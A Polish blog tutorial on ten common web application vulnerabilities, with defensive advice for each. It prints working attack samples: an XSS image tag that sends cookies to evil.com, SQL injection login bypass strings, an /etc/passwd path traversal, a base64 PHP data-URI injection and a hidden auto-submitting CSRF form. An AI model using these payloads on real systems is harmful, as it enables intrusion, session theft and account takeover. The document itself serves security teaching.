Computer Keyboard - Głównie JavaScript

Głównie JavaScript

by Jakub T. Jankiewicz

10 błędów aplikacji www, wykorzystywanych przez Hakerów

Grafika ze zdjęcia osoby w kapturze oraz kodu zero jedynkowego

Jeśli tworzysz aplikacje internetowe i jesteś Full-Stack-iem, czyli oprócz Front-End-u zajmujesz się także Back-End-em, czy jest to php, asp.net, java czy node.js, twoja aplikacja może być podatna na ataki hackerów a raczej crackerów.

W tym artykule przedstawię, najczęstsze błędy aplikacji internetowych, które mogą być wykorzystane przez Hackerów oraz jak się przed nimi bronić.

1. Cross-Site Scripting

XSS, czyli podatność wstrzykiwania zewnętrznego, polega na tym, że hacker/cracker wymusza na naszej aplikacji wykonanie zapytania HTTP do zewnętrznego serwera (wcześniej przez siebie przygotowanego), które zawiera zastrzeżone dane np. ciasteczka lub hasło. Może to być kod JavaScript ale również CSS albo XML.

Istnieją jego dwa rodzaje:

Reflected, czyli odwzorowany

Polega na tym, że w parametrze zapytania HTTP, możemy wstawić kod JavaScript, który zostanie odwzorowany w wygenerowanym kodzie. Nie musi to być zapytanie typu GET, w przypadku POST atakujący może utworzyć stronę na innym serwerze, która wyśle formularz do atakowanej strony. Wtedy URL takiej strony musiałby zostać przesłany ofierze np. w emailu. Aby taki URL wyglądał bezpieczniej atakujący może użyć np. przekierowania, które opisane będzie dalej w tym artykule lub skrócić URL za pomocą jednej z wielu usług np. bitly.com.

Przykładem może być zapytanie http://example.com/search?term=<script>alert('xss')</script>. Jeśli aplikacja wyświetli stronę 404 , z wyrażeniem term wstawionym do kodu HTML strony, będzie to XSS typy odwzorowanego.

Zapisany (ang. Stored)

Polega on na tym, że złośliwy kod jest zapisywany np. w bazie danych i za każdym razem, gdy jakiś użytkownik otworzy stronę wykona się ten kod.

Przykładem może być np. strona z newsami, gdzie użytkownicy dodają posty, a ich zawartość może być dowolnym kodem HTML.

W obu przypadkach wstrzykiwanym kodem może być np. dodanie obrazka, którego URL-em będzie atakowana strona razem z ciasteczkami użytkownika np.:

<img src="x" onerror="this.src='http://evil.com/cookie?' + encodeURIComponent(document.cookies);"/>

Jak się zabezpieczyć

Aby zapobiec atakom tylko XSS, należy filtrować dane od użytkownika oraz bazy danych lub je odpowiednio formatować (ang. escape), jeśli są wstawiane do naszej strony. Możemy np. skorzystać z jakieś frameworka, który zrobi to za nas. Często systemy szablonów nie pozwalają na wstawianie kodu HTML ze zmiennej i trzeba użyć specjalnej komendy lub filtra, aby była taka możliwość.

Co dalej

Polecam dwa artykuły, w języku angielskim, na stronach OWASP (czyli Open Web Application Security Project) XSS Filter Evasion Cheat Sheet oraz XSS (Cross Site Scripting) Prevention Cheat Sheet, czyli odpowiednio obchodzenie i zabezpieczanie aplikacji.

2. SQL Injection

Ta podatność polega na tym, że jeśli używamy danych od użytkownika, w zapytaniu SQL bez odpowiedniego ich formatowania, złośliwy użytkownik może wstrzyknąć swój kod SQL, który wykona się razem z tym naszym.

Na przykład nasza aplikacja może wywoływać takie zapytanie (kod php):

$query = "SELECT * FROM users WHERE username = '$username' and password = '$password'";

jeśli zmienna $username lub $password pochodzi od użytkownika, np. z URLa lub zapytania POST, to jest możliwość przekazać w niej, zamiast hasła, kod SQL np. ' or 1=1;--. Wynikowe zapytanie po wstawieniu naszego hasła będzie wyglądało następująco:

SELECT * FROM users WHERE username = 'name' and password = '' or 1=1;--'

To zapytanie zwróci dane danego użytkownika, mimo ze hasło jest pustym ciągiem znaków. (znaki ;-- oznaczają zakończenie zapytania oraz zakomentowanie tego co jest za nim, czyli znaku cytatu z oryginalnego zapytania; różne bazy danych mogą mieć różne znaki komentarza).

Innym przykładem może być przekazanie jako nazwę użytkownika user' -- wtedy, jeśli logowanie będzie podatne na SQL injection, będzie można się zalogować jako dany użytkownik bez hasła.

Istnieją trzy rodzaje tej podatności:

Zwykłe

Wyświetla dane z zapytania na stronie. Za pomocą niego można, w bardzo prosty sposób, wykraść wszystkie dane zapisane w bazie danych (np. poprzez zapytanie UNION SELECT, które pozwala na dodanie, danych z innej tabeli, do zapytania, do którego wstrzykiwany jest kod SQL), ale także hasło do bazy danych, jeśli aplikacja korzysta z konta root bazy. Jeśli aplikacja umożliwia wykonywanie wielokrotnych zapytań albo gdy mamy hasło do bazy danych atakujący może dodać do bazy dowolne dane np. jakiś złośliwy kod, gdy aplikacja jest podatna na XSS (nie sprawdza danych pochodzących z bazy).

Ślepe (ang. blind)

Natomiast ślepe może wyświetlać dwa rodzaje stron, np. pustą oraz z danymi, wtedy atakujący może wstrzyknąć zapytanie, które zwraca prawdę albo fałsz (można do tego celu użyć CASE..WHEN). Albo wyświetlać zwykłą stronę i stronę błędu, wtedy można użyć CASE..WHEN gdzie ELSE wywołuje błąd (można wywołać convert(int, 'x')). Aplikacja może także nie zwracać nic, ale nadal być podatna na SQL injection, można wtedy np. do zapytania, gdy zwraca prawdę, dodać opóźnienie i sprawdzać czas jaki zajmuje zapytanie. Jeśli chcemy np. zgadnąć hasło, nazwę użytkownika albo nazwę kolumny w bazie, trzeba sprawdzać nazwę znak po znaku np. używając funkcji substring.

Poprzez komunikat błędu

Jeśli aplikacja pokazuje błędy bazy danych, można wykorzystać je przy atakach typy SQL Injection. Np. baza danych MSSQL pokazuje jaka była wartość pola, gdy użyje się funkcji convert(int, wartość), można też z błędów odczytać nazwę kolumny co może być szybsze niż blind SQL Injection.

jak się zabezpieczyć

Aby zabezpieczyć się przed tego typu błędami, jeśli dane wejściowe od użytkownika muszą być użyte w zapytaniu SQL, trzeba tak jak w przypadku XSS odpowiednio je formatować (ang. escape). Najlepiej skorzystać z przygotowanych zapytań (ang. prepared statements). Polega to na tym, że zanim wykonamy zapytanie, przekazujemy do niego kod SQL z zamiennikami (ang. placeholers) np. pytajnikami a przy wywołaniu przekazujemy do tak przygotowanego zapytania dane, które zostaną odpowiednio sformatowane przez bibliotekę bazy danych, w zależności od typu.

Jeśli biblioteka do bazy danych zwraca wyjątki należy je przechwytywać w wyświetlać błąd przyjazny dla użytkownika. Prawdziwy błąd SQL można zapiać w pliku błędów. Oczywiście pliki logów powinny być zabezpieczone przez niepowołanym dostępem.

Co dalej

Korzystając z twojej ulubionej przeglądarki łatwo znajdziesz przykłady zapytań. np. wpisując "mysql sql injection cheat sheet" mysql możesz zastąpić dowolnym innym silnikiem. Istnieją także gotowe programy, którymi możesz przetestować „twoją” aplikację np. bardzo popularna aplikacja wiersza poleceń sqlmap. Bardzo fajną jego funkcją, jest dostęp do konsoli sql, która będzie wykonywała zapytania poprzez SQL injection na atakowanej stronie. Istnieje też do niego GUI. Innymi popularnymi narzędziami są Havij (działa tylko po Windows) oraz sqlninja.

Więcej o atakach poprzez komunikaty błędów w MSSQL możesz przeczytać w artykule: „Error-based SQL Injection w aplikacjach ASP(.NET) + MS SQL”. Innym ciekawym przykładem jest funkcja MySQL exp, która może być użyta do wyświetlenia zawartości komendy SELECT w komunikacie o błędzie. Więcej o tym ataku w artykule „MySQL Error Based SQL Injection Using EXP”.

Istnieją też ataki na bibliotekę Hibernate (w języku java), jest to ORM (ang. Object-Relational Mapping) czyli mapowanie obiektów bazodanowych na te z javy. Hibernate udsotępnia mini języki HQL i JPQL (ograniczone wersje SQL), które są podatne na wstrzykiwanie kodu SQL jako blind injection. Więcej o tym ataku w tej prezentacji (slajdy) z 2015 oraz prezentacja (Video ok godziny) „New Methods For Exploiting ORM Injections” z 2016, która oprócz Hibernate, pokazuje różne metody wykorzystywania, błędów Hibernate oraz innych bibliotek ORM dla języka java oraz różnych baz danych.

Podatne są także bazy NoSQL (czyli nie relacyjne), takie jak MongoDB, gdzie można wstrzyknąć kod JavaScript (jest on wewnętrznym językiem do definiowania zapytań oraz funkcji agregujących w mongo) lub obiekty JSON-a bezpośrednio do bazy. Zobacz ten artykuł na stonie owasp.org oraz artykuł No SQL, No Injection? Examining NoSQL Security (plik pdf po prawej stronie). Oba omawiają bazę mongoDB, najczęściej używaną bazę typu NoSQL. Jeśli chcesz przetestować aplikacje, która używa bazy NoSQL, możesz użyć narzędzia „Nosql-Exploitation-Framework”, które oprócz Mongo „obsługuje” także bazy: CouchDB, Redis, Cassandra oraz H-Base.

3. SSL/TLS i MITM

Jeśli przechowujemy wrażliwe dane w aplikacji, np. gdy mamy system logowania i przechowujemy dane użytkowników, powinniśmy udostępniać naszą aplikacje poprzez SSL/TLS czyli poprzez protokół https. W przeciwnym wypadku będą możliwe ataki typu Man-in-the-middle na naszą aplikacje.

Atak MITM wygląda tak, że jest osoba, przez którą „przechodzą” zapytania HTTP naszej aplikacji, gdy znajduje się ona gdzieś pomiędzy użytkownikiem a serwerem. Haker może np. przechwytywać ruch w publicznej sieci WIFI, ale nie tylko. Osoba atakująca może np. wstrzykiwać kod JavaScript do naszej aplikacji nawet jeśli nie jest podatna na XSS, wykraść dane sesji lub w przypadku, gdy nasza aplikacja nie korzysta z HTTPS do przesyłania hasła, na jego odczytanie. Istnieje także możliwość usunięcia SSL gdy aplikacja działa poprawnie także bez szyfrowania, więcej informacji możecie znaleźć szukając „strip ssl MITM”. Chociaż przeglądarka Google Chrome w wersji 62 pokazuje komunikat, że strona nie jest bezpieczna w pasku adresu, jeśli strona zawiera input box-y, a wersja 63 dodatkowo pokazuje go gdy wpisujemy jakiś tekst w dowolny element. Natomiast przeglądarka Firefox od wersji 52 pokazuje ikonkę w pasku adresu oraz komunikat przy input box-ie z hasłem.

Uwaga: W październiku 2017, został wykryty nowy atak na urządzenia z Androidem i Linux-em o nazwie Krack, który pozwala na złamanie szyfrowania WPA2 poprzez sklonowanie zaszyfrowanej sieci WiFi. Dzięki niemu możliwy jest atak MITM. Więcej na stronie błędu, na której można też znaleźć krótki filmik, który przedstawia jak wygląda atak.

Należy jednak pamiętać, że dzięki SSL nie zawsze będziemy zabezpieczenie przed atakami typu MITM, ktoś może np. przechwycić połączenie SSL zmieniając certyfikat, wtedy użytkownik otrzyma ostrzeżenie, że połączenie nie jest bezpieczne (użytkownik może zignorować taki błąd), chyba że atakujący spowoduje zainstalowanie certyfikatu urzędu certyfikacji na komputerze ofiary.

Istnieją także ataki na protokół https, możesz o nich przeczytać w tym artykule

Co dalej

Możesz obejrzeć:

Jak się zabezpieczyć

Przede wszystkim najlepiej całą aplikacje udostępniać poprzez szyfrowane połączenie (a nie tylko stronę logowania/rejestracji) i dodać przekierowanie ze http na https, strona http może pokazywać np. link do strony zaszyfrowanej. Można wymusić też na przeglądarce, aby dla każdego następnego zapytania zawsze było używane szyfrowanie za pomocą nagłówka HTTP Strict-Transport-Security. Więcej na tym nagłówku na stronie MDN. Ważne jest także, aby aplikacja nie pobierała żadnych danych za pomocą HTTP np. obrazków lub plików JS ponieważ wtedy pojawi się komunikat, że połączenie nie jest bezpieczne lub zostanie zablokowane przez przeglądarkę, gdy serwer zwróci wspomniany wcześniej nagłówek. Można też ustawić ciasteczka jako secure czyli takie, które będą przesyłane tylko poprzez szyfrowane połączenie.

4. LFI i RFI

LFI (ang. Local File Inclusion) nazywana jest także atakiem Directory Traversal (lub Path Traversal), ponieważ pozwala na dołączenie innego pliku, niż zamierzał autor strony/aplikacji. Natomiast RFI jest to skrót od Remote File Inclusion czyli zdalne wstrzykiwanie pliku.

LFI występuje jeśli np. aplikacja odczytuje plik z katalogu /templates/ i jako parametr otrzymuje nazwę szablonu np. template=main.tmpl, w takim przypadku można np. podać katalog z poza /templates/ dodając np. template=../../../../../../../etc/passwd w przypadku gdy serwer, na którym stoi aplikacja jest to system unix-owy.

Natomiast RFI występuje, gdy można wstrzyknąć url pliku, gdy aplikacja zakłada że otwiera się plik lokalny.

W obu przypadkach najczęściej wymienia się funkcje, w php, include, która umożliwia (jeśli nie sprawdzane są dane wejściowe od użytkownika) wstrzykiwanie pliku z kodem php. Jeśli aplikacja nie jest podatna na RFI ale podatna na LFI, poprzez funkcje include, to jeśli jest możliwość wgrywania plików, nawet w przypadku gdy można dodawać tylko pliki obrazków, to nadal można wstrzyknąć złośliwy kod php. Pliki obrazków umożliwiają dodawanie komentarzy w których można dodać kod php który np. może wykonywać upload plików już bez ograniczeń.

Do zagnieżdżenia kodu php, wewnątrz komentarza pliku jpeg, można użyć narzędzia wrjpgcom, które jest częścią libjpeg dla systemów Linux. Natomiast do plików png można użyć png-text-embed.

Istieje także możliwość wstrzyknięcia kodu php za pomocą data URI np. taki ciąg znaków data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=, spowoduje wstrzyknięcie kodu php, który wywoła funkcje phpinfo.

Jednak wcale nie musi to być wstrzyknięcie kodu. Zamiast kodu php można np. podać nazwę pliku konfiguracyjnego i poznać hasło do bazy.

Jak się zabezpieczyć

Przede wszystkim trzeba walidować wejście od użytkownika, można usuwać znaki . oraz /, ale lepszym rozwiązaniem jest tzw. biała lista (while list) czyli sprawdzanie czy zmienna, która jest pobierana od użytkownika, zawiera to co jest na liście dozwolonych wartości. Można też użyć funkcji basename, która zwróci samą nazwę pliku.

Jeśli aplikacja nie korzysta z php warto także sprawdzić czy nie jest podatna na tego typu błędy.

5. CSRF oraz Click Jacking

CSRF czyli Cross-Site Request Forgery to podatność aplikacji, w której atakujący wywoła akcje, która zrobi coś w systemie, której nie zainicjował użytkownik. Może to być wysłanie AJAX-em zapytania do serwera (w przypadku ataku XSS) lub wysłanie formularza na zewnętrznej stronie, której link jakoś zostanie wysłany do ofiary. Taki formularz może wyglądać tak:

<form action="http://podatna-aplikacja.pl/change-password" method="post" target="iframe_name" name="form_name">
 <input type="hidden" name="password" value="hacked"/>
 <input type="hidden" name="confirm" value="hacked"/>
</form>
<script>
document.forms['form_name'].submit();
</script>
<iframe id="iframe" style="display:none"></iframe>

Jeśli użytkownik otworzy taką stronę wyśle ona zapytanie POST do aplikacji, która zmieni hasło, jeśli użytkownik jest zalogowany. Wynikowa strona nie będzie widoczna dzięki temu że będzie ona w ukrytej ramce. Po wysłaniu formularza, strona może gdzieś przekierować użytkownika. Można to tego użyć zdarzenia onload dla ramki.

Jeśli myślisz, że Twoja aplikacja jest bezpieczna przed atakami CSRF, jeśli korzysta z JSON-a i napisana jest w JavaScript, a nie za pomocą formularzy, to się mylisz. Jeśli nie sprawdzasz jaki jest MIME zapytania po stronie serwera, czyli nagłówka Content-Type (powinien być „application/json”), to istnieje możliwość wysłania zapytania HTTP typu POST z typem text/plain, które może zawierać zwykły tekst. Więcej informacji na stronie StackOverlow oraz na pentestmonkey.net, która pokazuje jak wysłać XML ale z JSON-em będzie tak samo.

Natomiast Click Jacking polega na tym, że atakujący tworzy stronę, na której jest ukryty iframe z atakowaną stroną, gdzie wymagane jest aby ofiara kliknęła na jakiś przycisk np. aby coś wygrać, a w efekcie kliknięty zostanie przycisk z iframe-a.

Ukryć iframe można na dwa sposoby (może jest więcej):

 • ustawiając opacity ramki na 0.
 • tak ustawić z-index, aby ramka znalazła się pod fikcyjnym przyciskiem i ustawić dla przycisku pointer-events: none.

jak się zabezpieczyć

Najprostszym sposobem, aby uchronić się przed atakiem CSRF, w aplikacji napisanej w JavaScript, jest stworzenie API, które komunikuje się za pomocą JSON-a lub XML-a, a serwer sprawdza Content-Type każdego zapytania, którym nie może być text/plain. Do komunikacji z API trzeba oczywiście użyć AJAX-a. Nie uchroni to jednak aplikacji, które są podatne na XSS. W takim wypadku lepsze może być dodanie specjalnego unikalnego tokena do każdego zapytania, można go np. otrzymać po zalogowaniu. Jest to jedno z możliwych zabezpieczeń wymienionych przez stronę owasp.org.

Aby zapobiec atakowi typu click jacking, można wysyłać nagłówek HTTP X-Frame-Options, za pomocą którego możemy ograniczyć lub uniemożliwić wstawianie naszej aplikacji poprzez iframe-a. Więcej o tym nagłówku możesz przeczytać na stronie MDN.

Co dalej

Jeśli potrzebujesz jakiegoś innego mechanizmu możesz sprawdzić artykuł na stronie owasp.org „Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet”.

6. Nie sprawdzane przekierowania

Występuje np. gdy aplikacja dodaje do URL parametr redirect z URL-em lub ścieżką, na którą ma zostać przekierowany użytkownik. Może to być np. strona logowania, która przekierowuje na stronę, którą użytkownik próbował otworzyć, ale nie był zalogowany. Jeśli ten parametr nie jest sprawdzany, atakujący może podać URL do swojej strony phishing-owej jako parametr i wysłać takiego linka do swojej ofiary. Dodatkowo można zakodować każdy znak URLa jako %hex, aby ofiara nie zwróciła uwagi na inny adres przekierowania.

Innym błędem może być przypadek, gdy aplikacja zamierza przekierować użytkownika na inną stronę, np. na jeden z przygotowanych URLi, mogą to być sub domeny lub strony klientów, bez sprawdzania czy URL jest poprawny. Aplikacja może np. mieć linki w kodzie HTML, które wskazują gdzie należy przekierować i zakłada, że tylko takie przekierowania będą użyte.

7. Wstrzykiwanie CRLF

Polega na dodaniu znaku nowego wiersza i za nim jakiś złośliwych danych. Przykładem może być aplikacja, która wstawia dane z zapytania np. do nagłówka Location jak w przypadku nie sprawdzanego przekierowania. Istnieje jakieś prawdopodobieństwo, w zależności od tego, w jaki sposób dodawany jest ten nagłówek, że atakujący doda np. znak nowej lini (w przypadku protokołu HTTP powinno to być \r\n a w URL-u %0d%0a) i za nim nowy nagłówek np. Set-Cookie, który spowoduje, że będzie można wykorzystać podatność Session Fixation.

Istnieje także powiązany błąd tzw. HTTP Response Splitting, polega on na tym, że wstrzykuje się dwa razy CRLF aby dodać coś do odpowiedzi HTTP (wtedy można np. wykonać atak XSS).

W php (prawdopodobnie przed wersją 4.2.2), była podatna funkcja header, którą można było wykorzystać aby przeprowadzić atak typu CRLF, ale nie jest on już możliwy.

W 2016 odkryto problem z wstrzykiwaniem CRLF w Node.js, więcej o nim w artykule „HTTP Response Splitting in Node.js (bypassing Node.js’s HTTP Response Splitting protection)”.

Co dalej

Możesz zobaczyć te dwa artykuły:

8. Przechwytywanie sesji użytkownika

Są dwa sposoby przejęcia sesji użytkownika.

Session Fixation

W przypadku Session Fixation, czyli ustawianiu sesji, atakujący wymusza na ofierze użycie swojej sesji. Może to np. nastąpić gdy aplikacja jest podatna na wstrzykiwanie nagłówków HTTP (zobacz Wstrzykiwanie CRLF lub poprzez XSS. Innym sposobem jest wysłanie linka ofierze z parametrem sesji w URL-u. Php ma opcje pobierania identyfikatora sesji zarówno z URL-a jak i z ciasteczek.

Session Hijacking

Jest to metoda odwrotna. Atakujący może przechwycić identyfikator sesji od użytkownika i użyć go u siebie. Mogą być dwa sposoby przejęcia sesji.

 1. Atack MITM
 2. XSS

Jak się zabezpieczyć

Jeśli nasza aplikacja ma system logowania, można tworzyć nową sesje przy logowaniu a nie przy pierwszym wchodzeniu na stronę. Drugą opcją jest zmieniać identyfikator sesji przy każdej akcji (php udostępnia funkcje do tego celu - regenerate_session_id()) lub przynajmniej przy poprawnym zalogowaniu gdy sesja jest tworzona na każdej stronie. W php warto też tworzyć sesje tylko z ciasteczek oraz ustawiać ciasteczka z opcjami secure oraz httpOnly. W php można użyć takiego kodu:

ini_set('session.cookie_httponly', 1);
ini_set('session.use_only_cookies', 1);
ini_set('session.cookie_secure', 1);
session_start();

Te same opcje można włączyć w pliku php.ini.

Warto też całą stronę udostępniać poprze szyfrowane połączenie, czyli poprzez protokół HTTPS o czym była mowa w punkcie 3.

9. Błędny mechanizm autoryzacji

Występuje np. gdy nasza aplikacja niepoprawnie sprawdza, czy dany zasób powinien być udostępniony danej osobie. Oto kilka przykładów:

 • Aplikacja może udostępniać panel administracyjny, który jest schowany ale nie zabezpieczony hasłem (czyli w tak zwanym głębokim ukryciu), albo dostępny dla każdego zalogowanego użytkownika, a nie tylko administratora systemu.
 • Udostępnianie plików konfiguracyjnych które mogą np. zawierać hasło bazy danych
 • Dostęp do plików logów np. w ASP.Net możemy mieć zainstalowaną bibliotekę elmah, która loguje wszystkie błędy w aplikacji razem z zapytaniem HTTP, który je wykonał. Może on np. zawierać ciasteczka użytkowników.
 • Można się też spotkać z aplikacjami, które w pliku robots.txt, umieszczają ścieżki do ukrytych części serwisu. Plik ten może być pierwszym miejscem, które sprawdzi atakujący.

Możesz się też spotkać z nazwą Privilige Escalation, czyli zmianą uprawnień. Istnieją dwa jej rodzaje:

 • Pionowe - gdy atakujący uzyska dostęp do danych użytkownika o większych uprawnieniach np. administratora.
 • Poziome - jeśli atakujący ma dostęp do danych jako inny użytkownik o takich samych prawach dostępu.

Jednym z przykładów zmiany uprawnień może być przypadek, gdy przy zmianie hasła wykonywane jest zapytanie UPDATE i jeśli aplikacja podatna jest na SQL injection. W takim przypadku potrzebne będą dwie podatności typu SQL Injection, jedno SELECT, aby sprawdzić jakie są tabele oraz kolumny i drugie w UPDATE aby zmienić uprawnienia. Jeśli biblioteka do bazy danych danej aplikacji obsługuje wielokrotne zapytania, to nawet ten UPDATE nie musi być podatny i wystarczy jakikolwiek SELECT.

10. Błędy uwierzytelniania

Ataki na system logowania

Jeśli aplikacja nie sprawdza ilości nieudanych prób logowania, wtedy jest podatna na ataki typu siłowego (ang. brute force) albo słownikowego. Istnieją gotowe aplikacje np. Hydra, która wykonuje ataki słownikowe, razem z programem John the Ripper, umożliwia ataki brute force.

Jeśli aplikacja wyświetla inny komunikat przy niepoprawnej nazwie użytkownika, a inny przy niepoprawnym haśle, złamanie haseł będzie o wiele szybsze, ponieważ nie będzie trzeba sprawdzać wszystkich kombinacji użytkownik/hasło.

Innym błędem może być ograniczenie liczby znaków. Nie ma żadnego powodu, aby uniemożliwiać wpisywanie hasła o mniejszej liczbie znaków niż 100. Nie powinno się też ograniczać liczby znaków jakie można wpisać w hasło np. jeśli sprawdzamy czy hasło zawiera znaki, które mogą być próbą SQL Injection lub ataku XSS. Takie znaki powinny być dozwolone, aby zwiększyć liczbę potrzebnych kombinacji przy atakach brute force.

Przypominanie hasła

Jeśli przy resetowaniu hasła, pojawia się komunikat, że użytkownik nie istnieje a przy poprawnym, że email został wysłany może to spowodować, że atakujący może sprawdzać czy dany użytkownik ma konto czy nie. Co spowoduje już wyciek informacji. Innym błędem może być przypadek, gdy aplikacja resetuje hasło i wysyła go emailem na podany adres, może to spowodować że atakujący może zablokować komuś dostęp do strony. Wyobraźcie sobie np. portal aukcyjny gdzie jeden użytkownik resetuje komuś hasło aby wygrać licytacje.

Jak się zabezpieczyć

Jeśli chodzi o logowanie, to moim zdaniem najlepiej dodać opóźnienie w sekundach, które jest wielokrotnością liczby np. 2, gdy liczba prób większa niż np. 3 albo 5 (czyli \(2^{n-3} \ dla \ n > 3\) gdzie n == liczba prób) wraz z odpowiednim komunikatem. Można też dodać licznik w języku JavaScript. Oczywiście blokada musi być po stronie serwera. To skutecznie zabezpieczy przed atakiem typu brute force. Warto też wyświetlać ten sam komunikat, że „Hasło albo nazwa użytkownika nie są poprawne”.

Najlepszym sposobem dodania systemu przypominania hasła, jest wyświetlenie komunikatu, że email został wysłany. Komunikat powinien być taki sam w przypadku gdy email jest i nie ma go w bazie. Często można się spotkać z komunikatem, że email został wysłany. Ja proponuje coś w rodzaju „Jeśli masz konto w naszym portalu/aplikacji to wysłaliśmy ci email z dalszym postępowaniem”. Moim zdaniem taki komunikat jest lepszy z punktu widzenia UX, a nie powoduje żadnych problemów, bo jest taki sam w obu przypadkach.

Najlepiej jeśli email zawiera link z tokenem, który pozwoli zmienić hasło bez logowania, który zostanie unieważniony po np. godzinie od utworzenie lub po poprawnej zmianie hasła.

Na koniec

Jak się zabezpieczyć

Przede wszystkim trzeba zawsze walidować dane pochodzące od użytkownika, ale także te pochodzące od przeglądarki (jak np. nagłówki User-Agent, Referer czy Cookie, które łatwo zmienić, może się np. zdarzyć SQL injection w ciasteczkach) i odpowiednie je formatować gdy są użyte.

Co dalej

Jako wstęp polecam darmowy kurs w języku angielskim (bez logowania) na pluralsight.com „Hack Yourself First: How to go on the Cyber-Offense” autorem jest Troy Hunt ten od haveibeenpwned.com (gdzie można sprawdzić czy nasze konto podpięte pod dany email „wyciekło”). Ma już kilka lat ale nadal zawiera aktualne informacje. Polecam prędkość 1.4.

Polecam też prezentacje Mathiasa Bynensa (45 minut) „Hacking with Unicode in 2016”, z konferencji RuhrSec 2016. Przedstawia tam Unicode i problemy z kodowaniem, ale też różne błędy i jak je wykorzystać np. w MySQL. Przedstawia też podatności, które były znalezione w aplikacjach, np. Wordpress czy Joomla spowodowane kodowaniem znaków.

Możesz też zerknąć na stronę OWASP Top Ten Project (pdf po prawej stronie), która zawiera najważniejsze błędy, które mogą się znaleźć w web aplikacjach (co roku wychodzi nowy raport) oraz OWASP Top Ten Cheat Sheet, która zawiera informacje jak testować czy aplikacja jest na nie podatna. Szczególnie punkt pierwszy, injection, który zwiera więcej typów wstrzykiwania złośliwych danych. Innymi przydatnymi stronami są The WASC Threat Classification v2.0, która prezentuje błędy które mogą się znajdować w aplikacjach (niestety ostatnia aktualizacja 6 lat temu) oraz Raporty WhiteHat Security, które tak jak OWASP Top 10 wydawane są co roku. Aby pobrać pdf, trzeba podać dane, takie jak email czy firma, w której pracujesz. Link do raportu dostaniesz pocztą.

Jeśli chcesz sprawdzić, czy dana platforma/framework zawiera błędy, które można wykorzystać, możesz odwiedzić np. stronę cvedetails.com, która zawiera wszystkie zgłoszone błędy. Wystarczy że wpiszesz nazwę frameworka/biblioteki albo producenta, możesz także wyszukiwać po typie błędu. Możesz też wyszukiwać gotowe exploit-y, czyli przykład wykorzystania błędu, na stronie exploit-db.com.

Możesz też zainstalować sobie Kali Linux (dystrybucja do testów penetracyjnych) np. na za pomocą aplikacji VirtualBox (lub innej do tworzenia maszyn wirtualnych) oraz podatną aplikacje OWASP, na której można testować lokalnie różne błędy.

W przypadku programu VirtualBox, aby dwie maszyny wirtualne się widziały trzeba ustawić kartę sieciową podatnej maszyny w tryb mostkowy (ang. bridge mode) lub utworzyć usługę NAT, jeśli nie chcesz, aby inni użytkownicy sieci lokalnej mieli dostęp do twojej podatnej maszyny.

źródło strony (aby zobaczyć kod na GitHubie, musisz kliknąć przycisk raw)
Komentarze

Hasło, które podasz umożliwi ponowne zalogowanie się i np. usunięcie komentarza, jest dobrowolne. Email jest szyfrowany i używany do wysyłania powiadomień o odpowiedziach do komentarzy oraz do pobierania awatara dzięki usłudze Gravatar.com.